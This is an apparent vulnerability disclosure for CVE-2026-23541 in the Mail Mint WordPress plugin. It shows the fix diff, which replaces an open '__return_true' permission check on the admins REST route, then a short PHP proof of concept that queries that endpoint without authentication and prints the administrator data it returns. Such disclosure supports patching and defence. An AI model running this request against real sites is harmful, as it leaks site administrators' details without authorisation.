CVE-2026-23541: Mail Mint <= 1.19.4 – Missing Authorization (mail-mint)

--- a/mail-mint/app/API/Routes/Admin/WPRoute.php
+++ b/mail-mint/app/API/Routes/Admin/WPRoute.php
@@ -146,7 +146,7 @@
 				array(
 					'methods'             => WP_REST_Server::READABLE,
 					'callback'            => array( $this->controller, 'get_admins' ),
-					'permission_callback' => '__return_true',
+					'permission_callback' => PermissionManager::current_user_can( 'manage_options' ),
 				),
 			)
 		);
--- a/mail-mint/app/Internal/Parser/MergeTagParser.php
+++ b/mail-mint/app/Internal/Parser/MergeTagParser.php
@@ -181,66 +181,96 @@
 				$value = $this->get_cart_abandonment_value($value_key, $default_value, $abandoned_id);
 				break;
 			case 'edd':
-				$edd_parser = new EddMergeTagParser( $value_key, $default_value, $params );
-				$value      = $edd_parser->parse_edd_merge_tag();
+				if ( class_exists( EddMergeTagParser::class ) ) {
+					$edd_parser = new EddMergeTagParser( $value_key, $default_value, $params );
+					$value      = $edd_parser->parse_edd_merge_tag();
+				}
 				break;
 			case 'edd_customer':
-				$edd_parser = new EddMergeTagParser( $value_key, $default_value, $params );
-				$value      = $edd_parser->parse_edd_customer_merge_tag();
+				if ( class_exists( EddMergeTagParser::class ) ) {
+					$edd_parser = new EddMergeTagParser( $value_key, $default_value, $params );
+					$value      = $edd_parser->parse_edd_customer_merge_tag();
+				}
 				break;
 			case 'edd_billing':
-				$edd_parser = new EddMergeTagParser( $value_key, $default_value, $params );
-				$value      = $edd_parser->parse_edd_billing_merge_tag();
+				if ( class_exists( EddMergeTagParser::class ) ) {
+					$edd_parser = new EddMergeTagParser( $value_key, $default_value, $params );
+					$value      = $edd_parser->parse_edd_billing_merge_tag();
+				}
 				break;
 			case 'wc_subscription':
-				$wc_parser = new WCMergeTagParser( $value_key, $default_value, $params );
-				$value     = $wc_parser->parse_wc_subscription_merge_tag();
+				if ( class_exists( WCMergeTagParser::class ) ) {
+					$wc_parser = new WCMergeTagParser( $value_key, $default_value, $params );
+					$value     = $wc_parser->parse_wc_subscription_merge_tag();
+				}
 				break;
 			case 'product':
-				$wc_parser = new WCMergeTagParser( $value_key, $default_value, $params );
-				$value     = $wc_parser->parse_wc_product_merge_tag();
+				if ( class_exists( WCMergeTagParser::class ) ) {
+					$wc_parser = new WCMergeTagParser( $value_key, $default_value, $params );
+					$value     = $wc_parser->parse_wc_product_merge_tag();
+				}
 				break;
 			case 'wc_shipment_tracking':
-				$params['order_id'] = $order_id;
-				$wc_parser = new WCMergeTagParser( $value_key, $default_value, $params );
-				$value     = $wc_parser->parse_wc_shipment_tracking_merge_tag();
+				if ( class_exists( WCMergeTagParser::class ) ) {
+					$params['order_id'] = $order_id;
+					$wc_parser = new WCMergeTagParser( $value_key, $default_value, $params );
+					$value     = $wc_parser->parse_wc_shipment_tracking_merge_tag();
+				}
 				break;
 			case 'wc_adv_shipment':
-				$params['order_id'] = $order_id;
-				$wc_parser = new WCMergeTagParser($value_key, $default_value, $params);
-				$value     = $wc_parser->parse_wc_adv_shipment_tracking_merge_tag();
+				if ( class_exists( WCMergeTagParser::class ) ) {
+					$params['order_id'] = $order_id;
+					$wc_parser = new WCMergeTagParser($value_key, $default_value, $params);
+					$value     = $wc_parser->parse_wc_adv_shipment_tracking_merge_tag();
+				}
 				break;
 			case 'review':
-				$wc_parser = new WCMergeTagParser( $value_key, $default_value, $params );
-				$value     = $wc_parser->parse_wc_review_merge_tag();
+				if ( class_exists( WCMergeTagParser::class ) ) {
+					$wc_parser = new WCMergeTagParser( $value_key, $default_value, $params );
+					$value     = $wc_parser->parse_wc_review_merge_tag();
+				}
 				break;
 			case 'wc_membership':
-				$wc_parser = new WCMergeTagParser(  $value_key, $default_value, $params );
-				$value     = $wc_parser->parse_wc_membership_merge_tag();
+				if ( class_exists( WCMergeTagParser::class ) ) {
+					$wc_parser = new WCMergeTagParser(  $value_key, $default_value, $params );
+					$value     = $wc_parser->parse_wc_membership_merge_tag();
+				}
 				break;
 			case 'ld':
-				$wc_parser = new LearnDashTagParser( $value_key, $default_value, $params, $contact );
-				$value     = $wc_parser->parse_learn_dash_merge_tag();
+				if ( class_exists( LearnDashTagParser::class ) ) {
+					$wc_parser = new LearnDashTagParser( $value_key, $default_value, $params, $contact );
+					$value     = $wc_parser->parse_learn_dash_merge_tag();
+				}
 				break;
 			case 'fb_booking':
-				$fb_parser = new FBMergeTagParser($value_key, $default_value, $params);
-				$value     = $fb_parser->parse_fluent_booking_merge_tag();
+				if ( class_exists( FBMergeTagParser::class ) ) {
+					$fb_parser = new FBMergeTagParser($value_key, $default_value, $params);
+					$value     = $fb_parser->parse_fluent_booking_merge_tag();
+				}
 				break;
 			case 'fb_guest':
-				$guest_parser = new FBMergeTagParser($value_key, $default_value, $params);
-				$value        = $guest_parser->parse_fluent_booking_guest_merge_tag();
+				if ( class_exists( FBMergeTagParser::class ) ) {
+					$guest_parser = new FBMergeTagParser($value_key, $default_value, $params);
+					$value        = $guest_parser->parse_fluent_booking_guest_merge_tag();
+				}
 				break;
 			case 'fb_event':
-				$event_parser = new FBMergeTagParser($value_key, $default_value, $params);
-				$value        = $event_parser->parse_fluent_booking_event_merge_tag();
+				if ( class_exists( FBMergeTagParser::class ) ) {
+					$event_parser = new FBMergeTagParser($value_key, $default_value, $params);
+					$value        = $event_parser->parse_fluent_booking_event_merge_tag();
+				}
 				break;
 			case 'fb_host':
-				$host_parser = new FBMergeTagParser($value_key, $default_value, $params);
-				$value       = $host_parser->parse_fluent_booking_host_merge_tag();
+				if ( class_exists( FBMergeTagParser::class ) ) {
+					$host_parser = new FBMergeTagParser($value_key, $default_value, $params);
+					$value       = $host_parser->parse_fluent_booking_host_merge_tag();
+				}
 				break;
 			case 'wpfunnels':
-				$host_parser = new WPFMergeTagParser($value_key, $default_value, $params);
-				$value       = $host_parser->parse_wpf_merge_tag();
+				if ( class_exists( WPFMergeTagParser::class ) ) {
+					$host_parser = new WPFMergeTagParser($value_key, $default_value, $params);
+					$value       = $host_parser->parse_wpf_merge_tag();
+				}
 				break;
 			default:
 				$value = apply_filters('mint_merge_tag_group_callback_' . $data_key, $matches[0], $value_key, $default_value, $contact);
--- a/mail-mint/assets/admin/dist/automation_editor/index.min.asset.php
+++ b/mail-mint/assets/admin/dist/automation_editor/index.min.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'wp-a11y', 'wp-api-fetch', 'wp-components', 'wp-compose', 'wp-data', 'wp-deprecated', 'wp-element', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-plugins', 'wp-preferences', 'wp-primitives', 'wp-viewport'), 'version' => '15e2ec8a89ade7635787');
+<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'wp-a11y', 'wp-api-fetch', 'wp-components', 'wp-compose', 'wp-data', 'wp-deprecated', 'wp-element', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-plugins', 'wp-preferences', 'wp-primitives', 'wp-viewport'), 'version' => '8541c8b60335d7c28117');
--- a/mail-mint/assets/admin/dist/main/index.min.asset.php
+++ b/mail-mint/assets/admin/dist/main/index.min.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-deprecated', 'wp-editor', 'wp-element', 'wp-format-library', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-media-utils', 'wp-preferences'), 'version' => 'd58be174baba0dc24a1e');
+<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-deprecated', 'wp-editor', 'wp-element', 'wp-format-library', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-media-utils', 'wp-preferences'), 'version' => '94f98499b7b673dbbf20');
--- a/mail-mint/mail-mint.php
+++ b/mail-mint/mail-mint.php
@@ -15,7 +15,7 @@
  * Plugin Name:       Email Marketing Automation - Mail Mint
  * Plugin URI:        https://getwpfunnels.com/email-marketing-automation-mail-mint/
  * Description:       Effortless 📧 email marketing automation tool to collect & manage leads, run email campaigns, and initiate basic email automation.
- * Version:           1.19.4
+ * Version:           1.19.5
  * Author:            WPFunnels Team
  * Author URI:        https://getwpfunnels.com/
  * License:           GPL-2.0+
@@ -36,7 +36,7 @@
  * Start at version 1.0.0 and use SemVer - https://semver.org
  * Rename this for your plugin and update it as you release new versions.
  */
-define( 'MRM_VERSION', '1.19.4' );
+define( 'MRM_VERSION', '1.19.5' );
 define( 'MAILMINT', 'mailmint' );
 define( 'MRM_DB_VERSION', '1.15.3' );
 define( 'MINT_DEV_MODE', false );
--- a/mail-mint/vendor/composer/installed.php
+++ b/mail-mint/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'coderex/code-rex-crm',
         'pretty_version' => 'dev-master',
         'version' => 'dev-master',
-        'reference' => '3ee93f3573337fb74947484b14c34651a3139b8a',
+        'reference' => '17424d357dd5801268177fb4fac611443144d39e',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -22,7 +22,7 @@
         'coderex/code-rex-crm' => array(
             'pretty_version' => 'dev-master',
             'version' => 'dev-master',
-            'reference' => '3ee93f3573337fb74947484b14c34651a3139b8a',
+            'reference' => '17424d357dd5801268177fb4fac611443144d39e',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-23541 - Mail Mint <= 1.19.4 - Missing Authorization

<?php
$target_url = 'https://example.com'; // Change this to the target WordPress site URL

$endpoint = '/wp-json/mailmint/v1/admins';
$url = $target_url . $endpoint;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
// No authentication headers or cookies are required
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "Request URL: $urln";
echo "HTTP Status: $http_coden";
echo "Response:n";
if ($response) {
    $data = json_decode($response, true);
    if (json_last_error() === JSON_ERROR_NONE) {
        print_r($data);
    } else {
        echo $response;
    }
} else {
    echo "No response received.n";
}
?>